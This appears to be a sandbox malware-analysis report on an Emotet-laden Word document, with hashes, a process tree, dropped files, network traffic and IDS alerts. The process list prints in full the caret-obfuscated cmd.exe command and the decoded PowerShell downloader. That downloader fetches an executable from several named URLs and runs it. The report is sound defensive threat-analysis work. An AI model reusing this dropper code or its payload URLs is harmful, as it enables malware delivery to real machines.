File name: | be187532b8b4045bf1f4c9ae53a4154159aa7e586dc8c929c22933c900c76d62.doc |
Full analysis: | https://app.any.run/tasks/2ffb300d-65d2-49a2-948a-08a0c9a5de9b |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 15, 2018, 15:29:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 15 13:55:00 2018, Last Saved Time/Date: Thu Nov 15 13:55:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 1B541E7D976E067F5DE93FB994FBBA3A |
SHA1: | 86E05E82384C5403ECA74582B941852CCB012742 |
SHA256: | BE187532B8B4045BF1F4C9AE53A4154159AA7E586DC8C929C22933C900C76D62 |
SSDEEP: | 1536:7wSLkFI7ocn1kp59gxBK85fBF+aBC/4bUCxRebXP:8ow41k/W48gWsLP |
.doc | | | Microsoft Word document (80) |
---|
CompObjUserType: | nHwcFQQXAwjwwKkQITiJEzEubOQQNaN |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:15 13:55:00 |
CreateDate: | 2018:11:15 13:55:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3424 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\be187532b8b4045bf1f4c9ae53a4154159aa7e586dc8c929c22933c900c76d62.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2612 | c:\GVtCJlarNiWzC\hfHWAtVQb\SibkHzN\..\..\..\windows\system32\cmd.exe /C"s^e^t ^fJ=^=N^e&&^se^t ^WY=^ &&^se^t W^2^Fb=^W&&^s^et r^o^I=^w&&s^e^t ^I6^Q^p=R&&s^e^t ^u^jV^G=^B&&^se^t cqK=^j&&^se^t ^J^t^q=^f=&&^se^t ^7^T=^p&&^set ^in=n&&^se^t ^2^5^h=^-&&s^e^t d^k^Zv=^=^ ^1^;&&^s^et k^G^s=^{&&^s^et ^bJ=/&&^s^et ^g^s=^br&&^se^t G^2=^t&&^s^et r^d^4=o^p&&^s^e^t ^7S^i=t^t&&s^e^t ^I^Ev=^0^f&&^s^et ^9m^6=^s&&s^e^t J^2=t('^@^')^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et cl^w^F=^.&&^s^et ^h^3lj= ^$^h&&^se^t ^D^sx=x^ml^h&&^s^e^t ^m^E^i=^o&&^s^e^t ^X^PB=^@^h&&^s^e^t ^iC^q^a=s^t&&^s^et 2^5^8^H=^u&&^s^et ^5j^e=^i&&s^e^t ^1^hT^k=N^@&&^s^e^t ^i^7^W^9=^'^h&&^s^et ^Wa^O=^s^s&&s^e^t Ir=en(&&se^t ^UZ=m^p&&^se^t ^1o=^Pa^t^h&&s^et t^3=^m&&^s^e^t O^B^s^U=(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t uUv=^t&&s^e^t U^D^be=^i&&^s^e^t ^g^L=^-&&s^e^t ^da^7C=^@&&se^t ^E3^u=r&&^s^e^t ^h6^g=a^o&&^s^et 5U^q^G=^m&&^se^t g^j^9=^tp&&s^e^t U^m=)&&^s^et r^9^O^1=c&&^s^e^t J^l^G=^}&&s^et C^F^O^w=^e&&s^e^t RN=y^p&&s^e^t ^h^p=^tt^p&&se^t ^FCn^m=^T'^,&&s^e^t ^4^1r=^ac&&^s^e^t ^E^S^oz=e^f^bo^o^k&&^se^t ^ba^P=r&&^s^e^t ^DPo^w=^ ^ &&^set B^8=^e^t^s^.&&^se^t ^P^L=/^At&&^s^e^t ^u^9^t=^D6&&^se^t KzXt=^d&&s^e^t ^i^H=^on^s^eB^ody)&&^s^e^t R^M=^.&&^s^e^t g^9^ty=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t H^b^i=^an^d^.r^u&&^se^t F^g^O=^t&&^s^et ^K^i^J^X=^.&&^s^e^t G^My^4=c&&^se^t ^1^IVN=^H^,&&se^t ^mc=^a&&^se^t RP^m=^m&&^s^et ^HAf=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t e^b^m^B=/v^1^9&&^s^et bynP=^-^O^b&&^s^e^t ^4i=r^o&&^s^e^t ^6^SF=^ ^ &&set ^4^ID=^j&&^se^t ^m^ZN=}c^a^tc^h&&^s^et s^PW^M=r^s&&s^e^t m^lB^s=N&&^se^t R^pn=^p&&^s^et 9^W^m^x=^ ^=^ &&se^t S^a^1^h='^;^$Lb^q&&^se^t s^B8^5='^;&&^s^e^t P^lu^b=n&&^s^et 2l^K^X=//&&s^e^t c^G=^a&&s^e^t ^f^s2e=^h&&^s^et ^G^S^J=b^q&&^se^t ^s^mN^d=^://&&^s^et ^t^eO=^l&&s^e^t ^6^hg=^de&&s^e^t ^eu=^b^q&&^se^t ^t^K^U=l&&^s^e^t c^S^D^U=(&&s^e^t M^5^KC=^w&&s^e^t ^wcv=^h^t&&^s^et ^pc^xv=^M&&s^e^t ^3l^P=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^5N^Wd=^i&&^se^t ^EL=^l^ie^.r&&set ^Pzi^4=^o&&^se^t d^5=^l2&&^s^e^t ^WG=^f&&^s^et F^W^G^2=^:&&^se^t ^FR35=^w&&^s^et R^W=p^://^e&&^se^t C^A^I=/^E&&set ^B^y^5=^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^f^A=o^ &&^se^t ^S^Lp=(^'&&^se^t ^S^5k=)^+'&&s^e^t ^T^G^j^f=^-c&&^s^e^t ^3t=^hR&&s^e^t ^X^h=^o&&^s^e^t J^9P^7=^ec&&^s^e^t ^T3^L=^hRj^=(&&^s^e^t ^5V^U^9=^ '&&^s^et 6^K^8=^m&&^s^et ^5o=^\&&^s^e^t s^f^B^q=^t&&^se^t p^aV^Q=^'&&^s^e^t d^6^k=^0)&&^s^et G^4^aV=^ &&^s^e^t ^D^MU=^t&&^s^e^t M^pl^f=e^a&&s^et RC7=^j&&s^e^t ^Kk^o=^o&&^se^t ^4^mK=^h^t^t&&^s^e^t ^o^J=j^@&&s^e^t ^f^d=^t^p&&s^e^t ^kX^e^q=in^ $dcf)^{^tr&&^s^e^t u^J=^a&&s^e^t 2^O=^.&&^s^e^t r^5=^ &&^s^e^t Sx^O^J=^:&&^se^t ^I^hek=e^w&&^se^t ^sQ=^o^pe&&^s^et ^s^6=^ &&^s^e^t d^Sx^9=(&&^se^t ^JzT^X=/BN&&^s^et ^Er^L^X=^X&&s^e^t S^g^T=^;&&^s^et d^l^w=^bq&&^s^et O^i^s=^s^.co&&^s^et ^mZ^pH=^u&&s^e^t 6C=^og&&^se^t P^5=^=^'^jw&&s^e^t ^E^i^y=e^ &&^s^e^t ^wJ=V&&^se^t p^oV^s=^'&&^se^t ^Hc=^e(&&s^e^t 9^x= &&^se^t ^GR^gl=^p&&^s^et M^y=^h&&^s^et r^d=^e&&^s^e^t ^Hw^A=^.e^x&&s^e^t ^b1=^G^e&&^s^e^t S^6^s=^q^.s&&^s^e^t F^5n=^y^{$^W&&s^e^t 5^WT^u=)^;&&^s^et hR^S^B=^}^ &&^s^et ^bO^2=t^ ^-c&&^s^et ^h^j^p=^j&&s^e^t ^Tn=^i^X&&^s^e^t ^wv^8=^B&&^se^t k^i^lE=^UF&&^s^et r^y=^m&&s^e^t ^6^t=^e&&^se^t ^H^g=^j&&^s^e^t ^9^XF=^.&&^s^et o^J^s=^in&&^s^et ^Br^o=.^wr^it&&^s^et I^G^L=c^e&&^s^et ^Bg=p^o&&^se^t ^i57=^O&&^s^et ^7v=^E&&^s^et ^K^mFE=^e^m.&&^s^et ^36=l^k^ino-^a^t^e&&^s^et ^t^J=^S^y&&^s^e^t ^O^T=/&&^s^et ^h^d=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et D^L=t^o&&s^e^t ^2^h=^at&&^s^e^t wnN^p=r^e&&^s^et ^E^JP^2=^h(^$B^WH^ &&^s^et R^F=^h&&^se^t ^T^j^I=W^a&&^se^t ^i^S^U7=^e&&^s^e^t ^dcn^Z=^p^:&&^s^et j^P=^w&&s^e^t H^3^J=^h&&^se^t ^ovH^x=c&&^s^e^t ^s^2m=^G&&^se^t 2^B^H^i=p^e&&s^e^t E^g^y=^ao&&^se^t ^7z^do=^.&&s^e^t ^uVZ=^W&&s^e^t ^X^uG=^;^f^o&&^s^et ^S^kn^T= ^ &&^set T^B^e=-^P&&^set ^IO^Fz=^.^t&&s^e^t ^I^gq^Y=Wa^o&&set ^60pC=^ll&&s^e^t ^EC=^sx^m&&^s^et C^B^Hs=^h&&^s^et B^m^i=/^p&&^se^t I^s=^]:&&^s^et ^u^g^K^E=^d&&^se^t ^4^G=^e&&^s^et ^Xf=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^G8=^s^e&&^s^et tn^F^a=^av&&^s^et K^g^aU=^;S&&s^et ^F^Pu=^'^.^Sp^l&&^se^t ^P^Lc=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^U^A=^t&&s^e^t ^EC^s8=^ec&&s^e^t B^7^6=^st^o&&^s^et G^t=/&&^s^e^t R^M^38=.^a^l&&^s^et f^S^5k=^L&&^se^t t^b=^:&&s^e^t ^b^oBH=^T&&^s^et C^aU^M=^o&&^se^t 1^Q=^ &&s^e^t ^Tj^X=r^e&&s^e^t ^Xs^mo=^k&&^se^t d^p=^P&&^se^t ^T5^f^d=r&&^s^et ^SF^Ed=^;&&^s^et ^T^k^An=^b&&^s^et ^tn^E^P=^[&&s^e^t 5^y^a=res&&^s^et ^Fi^2=^o&&^s^e^t ^U1^E=^L&&s^e^t ^dN^D=^ &&^s^e^t J^6w^g=^e&&s^e^t ^b^P^J9=^L&&^s^e^t ^2F^3=^.&&^s^e^t p^K=^ado^d^b.^s^tr^eam&&^se^t X^e^bc=co^.&&^s^et f^7=)^;$^L&&^s^e^t ^4^0e^5=^l&&^s^et ^d^G^t=^il/^l&&s^e^t R^z^1^i=)^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^Jl^K=a^l&&^se^t ^Pw=re&&^s^et ^5^Q^av=^ &&^se^t T5^9^Z=^IO&&^s^e^t ^K^f=^w&&set ^9n=L^y&&^s^et e^0f^S=r&&s^e^t ^U^Y=^t&&s^et ^XU=a^b&&s^e^t ^w^tA^S=^$L^b&&s^e^t ^K^8=^f&&s^e^t ^1^hR=^ ^'&&c^a^ll ^s^et pZmI=%R^pn%%^Kk^o%%j^P%%^6^t%%s^PW^M%%M^y%%r^d%%^60pC%%1^Q%%^HAf%%^Tn%%^H^g%%P^5%%^m^E^i%%s^B8^5%%^P^Lc%%KzXt%%G^My^4%%^J^t^q%%^i^7^W^9%%^D^MU%%^U^Y%%R^W%%^t^K^U%%6C%%^9m^6%%^2F^3%%X^e^bc%%^d^G^t%%o^J^s%%^wJ%%^u^jV^G%%^I^Ev%%^o^J%%^4^mK%%^dcn^Z%%^O^T%%G^t%%^Jl^K%%^g^L%%u^J%%e^0f^S%%^XU%%^Bg%%B^8%%r^9^O^1%%^Pzi^4%%5U^q^G%%e^b^m^B%%^9n%%^u^9^t%%^da^7C%%H^3^J%%^7S^i%%^7^T%%F^W^G^2%%^bJ%%B^m^i%%^4i%%c^G%%^T5^f^d%%^ovH^x%%R^F%%^5N^Wd%%^t^eO%%H^b^i%%^JzT^X%%^1^hT^k%%^wcv%%g^j^9%%^s^mN^d%%r^o^I%%M^5^KC%%^K^f%%R^M^38%%^E^S^oz%%B^7^6%%^Tj^X%%O^i^s%%r^y%%C^A^I%%^f^s2e%%^X^PB%%^h^p%%Sx^O^J%%2l^K^X%%2^B^H^i%%^Pw%%^6^hg%%^36%%^EL%%2^5^8^H%%^P^L%%^WG%%^mZ^pH%%k^i^lE%%^F^Pu%%^5j^e%%J^2%%^T3^L%%^tn^E^P%%^t^J%%^iC^q^a%%^K^mFE%%T5^9^Z%%R^M%%^1o%%I^s%%t^b%%^b1%%G^2%%^b^oBH%%^4^G%%^UZ%%d^p%%^2^h%%C^B^Hs%%c^S^D^U%%^S^5k%%^5o%%^pc^xv%%^Er^L^X%%^b^P^J9%%^Hw^A%%C^F^O^w%%p^oV^s%%R^z^1^i%%^T^j^I%%^f^A%%^fJ%%^FR35%%bynP%%cqK%%^EC^s8%%uUv%%G^4^aV%%^T^G^j^f%%^Fi^2%%6^K^8%%^1^hR%%RP^m%%^EC%%d^5%%cl^w^F%%^D^sx%%F^g^O%%^f^d%%S^a^1^h%%9^W^m^x%%m^lB^s%%^I^hek%%^2^5^h%%^i57%%^T^k^An%%^4^ID%%J^9P^7%%^bO^2%%C^aU^M%%t^3%%^5V^U^9%%p^K%%p^aV^Q%%^X^uG%%wnN^p%%^4^1r%%^E^JP^2%%^kX^e^q%%F^5n%%^h6^g%%2^O%%^sQ%%^in%%^S^Lp%%^s^2m%%^7v%%^FCn^m%%^h^d%%^wv^8%%W^2^Fb%%^1^IVN%%d^6^k%%^B^y^5%%^I^gq^Y%%^9^XF%%^G8%%P^lu^b%%^u^g^K^E%%d^Sx^9%%5^WT^u%%^3l^P%%f^S^5k%%^G^S^J%%^K^i^J^X%%r^d^4%%Ir%%f^7%%d^l^w%%^IO^Fz%%RN%%^E^i^y%%d^k^Zv%%^Xf%%^U1^E%%^eu%%^Br^o%%^Hc%%g^9^ty%%^uVZ%%E^g^y%%^7z^do%%5^y^a%%^GR^gl%%^i^H%%^SF^Ed%%^w^tA^S%%S^6^s%%tn^F^a%%J^6w^g%%D^L%%^K^8%%U^D^be%%^4^0e^5%%^i^S^U7%%O^B^s^U%%^3t%%^h^j^p%%U^m%%K^g^aU%%s^f^B^q%%^mc%%^ba^P%%^U^A%%T^B^e%%^E3^u%%^X^h%%I^G^L%%^Wa^O%%^h^3lj%%^I6^Q^p%%RC7%%S^g^T%%^g^s%%M^pl^f%%^Xs^mo%%^m^ZN%%k^G^s%%J^l^G%%hR^S^B%%^s^6%%r^5%%^5^Q^av%%^6^SF%%^S^kn^T%%^WY%%^DPo^w%%^dN^D%%9^x%&&ca^l^l %p^Z^mI%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3216 | powershell $iXj='jwo';$dcf='http://elogs.co.il/linVB0fj@http://al-arabpoets.com/v19LyD6@http://proarchiland.ru/BNN@http://www.alefbookstores.com/Eh@http://peredelkino-atelie.ru/AtfuUF'.Split('@');$hRj=([System.IO.Path]::GetTempPath()+'\MXL.exe');$Wao =New-Object -com 'msxml2.xmlhttp';$Lbq = New-Object -com 'adodb.stream';foreach($BWH in $dcf){try{$Wao.open('GET',$BWH,0);$Wao.send();$Lbq.open();$Lbq.type = 1;$Lbq.write($Wao.responseBody);$Lbq.savetofile($hRj);Start-Process $hRj;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2896 | "C:\Users\admin\AppData\Local\Temp\MXL.exe" | C:\Users\admin\AppData\Local\Temp\MXL.exe | — | powershell.exe |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Exit code: 0 Version: 5.4.38.36 | ||||
2696 | "C:\Users\admin\AppData\Local\Temp\MXL.exe" | C:\Users\admin\AppData\Local\Temp\MXL.exe | MXL.exe | |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Exit code: 0 Version: 5.4.38.36 | ||||
2868 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | MXL.exe | |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Version: 5.4.38.36 | ||||
3408 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Version: 5.4.38.36 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3424 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9201.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GZRIQEVKSA18MJLJHO4D.temp | — | |
MD5:— | SHA256:— | |||
3216 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\947[1].exe | — | |
MD5:— | SHA256:— | |||
3424 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$187532b8b4045bf1f4c9ae53a4154159aa7e586dc8c929c22933c900c76d62.doc | pgc | |
MD5:BCA9AEA32113681E4187AA41E2D64816 | SHA256:3CACDFF3F1DA160541F802CBA8AB7B388895157EA6CD1B53469DA252F8F134CD | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:43B01A05BB940A9D5D0BE924AB203E0A | SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B | |||
3216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\MXL.exe | executable | |
MD5:0B0DC2B2CCD4B46B3381508F7209A582 | SHA256:66AE33003289D8C6C3DC7C45C1B01110B4820281061292AC076B1783700A1F2D | |||
2696 | MXL.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:0B0DC2B2CCD4B46B3381508F7209A582 | SHA256:66AE33003289D8C6C3DC7C45C1B01110B4820281061292AC076B1783700A1F2D | |||
3424 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:701B0C0CD1B98BE223099FC32CC074FB | SHA256:27D2AD4E94C4E205170B2E1BC9BF9FA10A0E02980BC9D08726A1135CABF3D4B2 | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF109c32.TMP | binary | |
MD5:43B01A05BB940A9D5D0BE924AB203E0A | SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3216 | powershell.exe | GET | 301 | 193.25.100.133:80 | http://elogs.co.il/linVB0fj | DE | html | 236 b | malicious |
3216 | powershell.exe | GET | 200 | 193.25.100.133:80 | http://elogs.co.il/linVB0fj/ | DE | executable | 162 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3216 | powershell.exe | 193.25.100.133:80 | elogs.co.il | Hoffrath & Janssen GbR | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
elogs.co.il |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3216 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3216 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3216 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3216 | powershell.exe | A Network Trojan was detected | ET TROJAN VBScript Redirect Style Exe File Download |
3216 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |